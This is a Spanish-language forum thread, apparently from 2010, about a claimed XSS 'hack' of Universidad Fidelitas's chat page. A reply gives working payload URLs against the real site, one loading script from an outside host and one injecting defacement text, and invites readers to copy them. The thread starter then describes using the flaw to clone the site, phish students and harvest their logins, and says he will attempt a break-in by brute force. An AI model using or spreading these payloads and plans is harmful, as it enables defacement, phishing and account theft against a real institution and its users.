Hacking Universidad Fidelitas [PwneD! 2010]

bueno ya di mi primer paso algo es algo jaja
Recuérdame Remember Me 2010

58885181.jpg
que se supone que es eso?
 
La seguridad informática siempre me ha llamado la atención, aunque no tengo experiencia en eso. Gracias por el tuto, un día de estos le hecho el ojo.

Gracias.
 
No sé porqué esto me recordo cuando hackearon a PHPBB.

Y no fue gracioso, menos porque hackear a una pagina sin fines de lucro que beneficia el crecimiento de internet fue extramadamente retard.

sabes en que esta hecho elhacker.net? jujuj... PHPBB, ya pasó
 
Mae donde apendió todo eso? Que es que ya sacó alguna profesión sobre algo de informática? o que son cursos que se tomo o lo aprendió de la internet? Mae porque a mi me super cuadran esas varas y me gustaría saber
 
Mae donde apendió todo eso? Que es que ya sacó alguna profesión sobre algo de informática? o que son cursos que se tomo o lo aprendió de la internet? Mae porque a mi me super cuadran esas varas y me gustaría saber

leer.. mucho tener paciencia.. no no hice ningun curso, eso no lo enseñan.. en todos lados solo te dan bases, luego lo que tu quieras es cosa de uno mismo. =)
 
leer.. mucho tener paciencia.. no no hice ningun curso, eso no lo enseñan.. en todos lados solo te dan bases, luego lo que tu quieras es cosa de uno mismo. =)

osea todo lo aprendio en la internet? Mae me puede pasar unas paginas o de donde halla aprendido esas varas?
 
osea todo lo aprendio en la internet? Mae me puede pasar unas paginas o de donde halla aprendido esas varas?
mira.. te explico lo siguiente son cosas muy grandes.. pero todo esta marcado por categorias.. programacion, seguridad, etc etc.. todo esta en lo que en si quieras aprender.. y bueno.. yo quiero que todos aprendan ya que el verdadera fuerza, no esta en solo 1 persona.. sino en la colectividad.. ya que cada mente es un mundo.. y nadie piensa igual es mas facil "cortar un arbol entre 2 personas a la vez, que uno solo" en lo que tengas dudas solo pregunta, que si puedo con gusto te ayudaré.. por cualquier cosas mi msn es [email protected] :)
 
Viejo muy interesante toda esta info me gustaria pareder mas de este tipo de cosas, tengo una duda que utilizaste para revisar(scanear) los puertos de la pagina????
 
Viejo muy interesante toda esta info me gustaria pareder mas de este tipo de cosas, tengo una duda que utilizaste para revisar(scanear) los puertos de la pagina????
hola, bueno para eso ahi muchas aplicaciones, yo uso el MetaSploit Framework, si queres agregame y te ayudo en lo que pueda [email protected] saludos..
 
buenas

Me presento soy James Jara leader de tecnologia y seguridad informatica.
jaja es mi primer palabra.. primero que todo esto no es un hack, mucho menos un intrusion al servidor de Fidelitas. Esto es la cosa mas NOOB que el mundo puede ver :) .pero animo un dia lo lograras.

Como podemos ver el amateur hace un scann , simple. no significa nada,es gratis.
Luego seguramente ud hace un scan nivel web puerto 80, luego este scan le dice que ese chat tiene una vulnerabilidad : correcto. pero de que esto sea hacking es otra cosa.

Este vulnerabilidad no significa nada grave, ya que no puede INGRESAR EN EL SERVIDOR , es una vulnerabilidad de lado cliente, quiero decir los exploradores webs ya sea firefox, mozilla, chrome, iexplorer. por lo cual se a de llamar vulnerabilidad XSS, en ningun momento sera vulnerabilidad de inyec html al servidor xq ese servidor ud jamas lo toca.

Las xss es tan simple como copiar este texto y pegarlo en la barra del explorador web respecto javascript:alert('me autohackie'); y pensar que te auto hackeaste::)

Explico el problema

Lo que hjace esta pagina es leer un archivo, ahora que pasa si le cambios la ruta a ese archivo por una nuestra.
pagina:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo original
noobed:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo malicioso
simple no hacking.
Entonces con solo tener subido al internet una pagina l aponemos ahi , DAMOS EL ENLACE Y LISTO.

http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script src=http://k0jub0t.webcindario.com/k0jun0%3E%3C/script%3E%3C/script%3E2]%3Cscript%20src=http://k0jub0t.webcindario.com/k0j%3E%3C/script%3E

PORQUE NO ES HACKING?
porque esto no exist y no pasa en ningun lado, solo en el CLICK, osea el enlace esta puesto en el click, osea que si ustedes entran a
http://www.ufidelitas.ac.cr/chat/image.php NO VERAN NADA DE NADA. por lo cual esto no es hacking.

CLICK AQUI PARA VER UN SUPUESTO HACKING MIO

AHORA QUIEREN USTEDES HACER ESTO , es simple si sabenm algo basico de html mejor

Modifique donde dice modificar texto, y luego copien y peguen todo en la barra de navegacvion, incluyxo pueden agregar el enlace aqui y todo seremos hackers.

en lo que esta de color verde pueden meter una imagen, la URL de una imagen.
En lo que esta de color rojo pueden meter texto y html, no metan comillas.

Linkk:
http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script>document.write('<img src=http://img517.imageshack.us/img517/4194/user43299pic21621208410.jpg><center> PWNED, turk team legion 43 cr james jara 3ple-j </center>"<body bgcolor="black">');</script>


bueno y en todo caso man va xel buen camino jajaja, si ud quiere es bienvenido, yo recluto hackers , informaticos, y todo tipo de varas jaja PAZZZZ buena vibra
 
Me presento soy James Jara leader de tecnologia y seguridad informatica.
jaja es mi primer palabra.. primero que todo esto no es un hack, mucho menos un intrusion al servidor de Fidelitas. Esto es la cosa mas NOOB que el mundo puede ver :) .pero animo un dia lo lograras.

Como podemos ver el amateur hace un scann , simple. no significa nada,es gratis.
Luego seguramente ud hace un scan nivel web puerto 80, luego este scan le dice que ese chat tiene una vulnerabilidad : correcto. pero de que esto sea hacking es otra cosa.

Este vulnerabilidad no significa nada grave, ya que no puede INGRESAR EN EL SERVIDOR , es una vulnerabilidad de lado cliente, quiero decir los exploradores webs ya sea firefox, mozilla, chrome, iexplorer. por lo cual se a de llamar vulnerabilidad XSS, en ningun momento sera vulnerabilidad de inyec html al servidor xq ese servidor ud jamas lo toca.

Las xss es tan simple como copiar este texto y pegarlo en la barra del explorador web respecto javascript:alert('me autohackie'); y pensar que te auto hackeaste::)

Explico el problema

Lo que hjace esta pagina es leer un archivo, ahora que pasa si le cambios la ruta a ese archivo por una nuestra.
pagina:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo original
noobed:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo malicioso
simple no hacking.
Entonces con solo tener subido al internet una pagina l aponemos ahi , DAMOS EL ENLACE Y LISTO.

http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script src=http://k0jub0t.webcindario.com/k0jun0%3E%3C/script%3E%3C/script%3E2]%3Cscript%20src=http://k0jub0t.webcindario.com/k0j%3E%3C/script%3E

PORQUE NO ES HACKING?
porque esto no exist y no pasa en ningun lado, solo en el CLICK, osea el enlace esta puesto en el click, osea que si ustedes entran a
http://www.ufidelitas.ac.cr/chat/image.php NO VERAN NADA DE NADA. por lo cual esto no es hacking.

CLICK AQUI PARA VER UN SUPUESTO HACKING MIO

AHORA QUIEREN USTEDES HACER ESTO , es simple si sabenm algo basico de html mejor

Modifique donde dice modificar texto, y luego copien y peguen todo en la barra de navegacvion, incluyxo pueden agregar el enlace aqui y todo seremos hackers.

en lo que esta de color verde pueden meter una imagen, la URL de una imagen.
En lo que esta de color rojo pueden meter texto y html, no metan comillas.

Linkk:
http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script>document.write('<img src=http://img517.imageshack.us/img517/4194/user43299pic21621208410.jpg><center> PWNED, turk team legion 43 cr james jara 3ple-j </center>"<body bgcolor="black">');</script>


bueno y en todo caso man va xel buen camino jajaja, si ud quiere es bienvenido, yo recluto hackers , informaticos, y todo tipo de varas jaja PAZZZZ buena vibra


jaja, se lo sonaron, yo le iba a echar la misma hablada pero me dio pereza, yo soy ing en sistemas, y tengo mi propia empresa de hosting y programacion web, algo he aprendido para asegurar mis servidores hasta donde se pueda, y no mas ver el post del compa que inicio el tema, y me recorde a mi mismo hace como 15 años cuando yo jugaba de hacker, jeje cuando no pasaba de ser un "script kiddie", pero dale, que se aprende bastante, mientras no busques hacer daños.
 
Me presento soy James Jara leader de tecnologia y seguridad informatica.
jaja es mi primer palabra.. primero que todo esto no es un hack, mucho menos un intrusion al servidor de Fidelitas. Esto es la cosa mas NOOB que el mundo puede ver :) .pero animo un dia lo lograras.

Como podemos ver el amateur hace un scann , simple. no significa nada,es gratis.
Luego seguramente ud hace un scan nivel web puerto 80, luego este scan le dice que ese chat tiene una vulnerabilidad : correcto. pero de que esto sea hacking es otra cosa.

Este vulnerabilidad no significa nada grave, ya que no puede INGRESAR EN EL SERVIDOR , es una vulnerabilidad de lado cliente, quiero decir los exploradores webs ya sea firefox, mozilla, chrome, iexplorer. por lo cual se a de llamar vulnerabilidad XSS, en ningun momento sera vulnerabilidad de inyec html al servidor xq ese servidor ud jamas lo toca.

Las xss es tan simple como copiar este texto y pegarlo en la barra del explorador web respecto javascript:alert('me autohackie'); y pensar que te auto hackeaste::)

Explico el problema

Lo que hjace esta pagina es leer un archivo, ahora que pasa si le cambios la ruta a ese archivo por una nuestra.
pagina:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo original
noobed:
http://www.ufidelitas.ac.cr/chat/image.php?=ruta archivo malicioso
simple no hacking.
Entonces con solo tener subido al internet una pagina l aponemos ahi , DAMOS EL ENLACE Y LISTO.

http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script src=http://k0jub0t.webcindario.com/k0jun0%3E%3C/script%3E%3C/script%3E2]%3Cscript%20src=http://k0jub0t.webcindario.com/k0j%3E%3C/script%3E

PORQUE NO ES HACKING?
porque esto no exist y no pasa en ningun lado, solo en el CLICK, osea el enlace esta puesto en el click, osea que si ustedes entran a
http://www.ufidelitas.ac.cr/chat/image.php NO VERAN NADA DE NADA. por lo cual esto no es hacking.

CLICK AQUI PARA VER UN SUPUESTO HACKING MIO

AHORA QUIEREN USTEDES HACER ESTO , es simple si sabenm algo basico de html mejor

Modifique donde dice modificar texto, y luego copien y peguen todo en la barra de navegacvion, incluyxo pueden agregar el enlace aqui y todo seremos hackers.

en lo que esta de color verde pueden meter una imagen, la URL de una imagen.
En lo que esta de color rojo pueden meter texto y html, no metan comillas.

Linkk:
http://www.ufidelitas.ac.cr/chat/image.php?l=1</script>2]<script>document.write('<img src=http://img517.imageshack.us/img517/4194/user43299pic21621208410.jpg><center> PWNED, turk team legion 43 cr james jara 3ple-j </center>"<body bgcolor="black">');</script>


bueno y en todo caso man va xel buen camino jajaja, si ud quiere es bienvenido, yo recluto hackers , informaticos, y todo tipo de varas jaja PAZZZZ buena vibra
jajaja.. primero perdonen por no rsponder mas, solo que no estoy en cr,estoy en colombia de vacaciones y sinceramente ya se me habia olvidado esto pero en fin.. juajua vamos pues, dices que no es hacking eh ? okay te explico, aunque tu explicacion no esta mal, si te equivocaste en el punto mas importante, el xss si es una vulnerabilidad por lo tanto es explotable yo en mi caso al sacarla solo le incruste html, pero bien hubiese podido bajarme una lista de usuarios, e emails de esa web y hubiese podido mandar emails, de remitente ufidelitas solicitando cualquier tipo de informacion, redireccionando a los usuarios a una pagina clon de la ufidelitas ( que es extremadamente facil hacerlo, y modificando un poco los campos de user y pass los redirecciono a un servidor web, al momento de mandar la peticion que en este caso seria http) y asi facilmente tendria acceso a todas las cuentas de usuarios de esa universidad xD!) pero no me DIO la gana de hacerlo asi, solo demostrar que habia xss en esa web :D, jajaj pero en fin, no se que querias mostrarme, ademas no eh visto que allas hecho interesante, ni una web, del tema, u foro, ni nada, pero bueno dices ser eso jejej..recuerdas el latinchat viejo? sabes quien saco la vulnerabilidad de tumbar salas, congelar salas, expulsar usuarios, y hasta robarse los perfiles? pregunta ::D! entre otros pero bueno ( mejor me quedo callado por que en este foro son bien envidiosos y todo lo toman a mal y luego dicen" "uy ke mae mas rajon uy ke mae esto uy ke mae lo otros , a mi me vale pero que perexa jajaja.. y ahi muchas formas de hacer ina intruicion, ya sean de vulnerabilidades propias del server o una simple fuerza bruta, con lista de users y lista de passwords xDD! whatever.. no eh tratado de entrar ahi por que eso lleva tiempo, pero lo intentare a ver que sucede. y james, jajaj recuerdas quien es tu master en el salon de patines music? si, roberto, o k0jun0 el mismo que te esta escribiendo! ahora mismo :D!, y el que va bien, eres tu :D saludos locon :p :opera:
 

Se acaba de postear

Últimas Noticias de Costa Rica

📑 Evite Incurrir en Multas y Sanciones: Ofrecemos servicios de presentación de declaraciones de IVA (D104), alquileres (D125) y la anual de renta (D101)

🦉Prepración para examenes desde 6to hasta Bachillerato por madurez.
¡Obtenga su título!

¿Está a favor de la portación de armas para la defensa personal?

  • Sí, para garantizar la seguridad individual

  • No, para reducir el riesgo de incidentes violentos


Los resultados solo son visibles tras votar.

TicosLand is now also available on Android and iOS

¿Las universidades públicas costarricenses son refugios de ideologías extremistas?

  • Sí, son una cueva de profesores parásitos

    Votos: 365 59,2%
  • No, son cunas del libre pensamiento

    Votos: 252 40,8%

¿Apoya la creación de una ley de eutanasia en Costa Rica?

  • Sí, por el derecho a una muerte digna

  • No, por el respeto absoluto a la vida


Los resultados solo son visibles tras votar.

En tendencia

¿Costa Rica debería promover abiertamente el turismo sexual?

  • Sí, podría dar un impulso económico

  • No, debido a las implicaciones morales y sociales negativas


Los resultados solo son visibles tras votar.

🚀 FACTURATica.com la #1 sin Mensualidades ni Anualidades. Inscripción gratis en Hacienda.

¿Estaría de acuerdo en la pena de muerte para crímenes graves y flagrantes?

  • Sí y también para la corrupción

  • No, por el riesgo de errores judiciales y la ética de la vida


Los resultados solo son visibles tras votar.

¿Debería Costa Rica legalizar la marihuana para uso recreativo?

  • Sí, por los beneficios económicos y de seguridad

  • No, debido a los potenciales riesgos para la salud y la sociedad


Los resultados solo son visibles tras votar.
Atrás
Arriba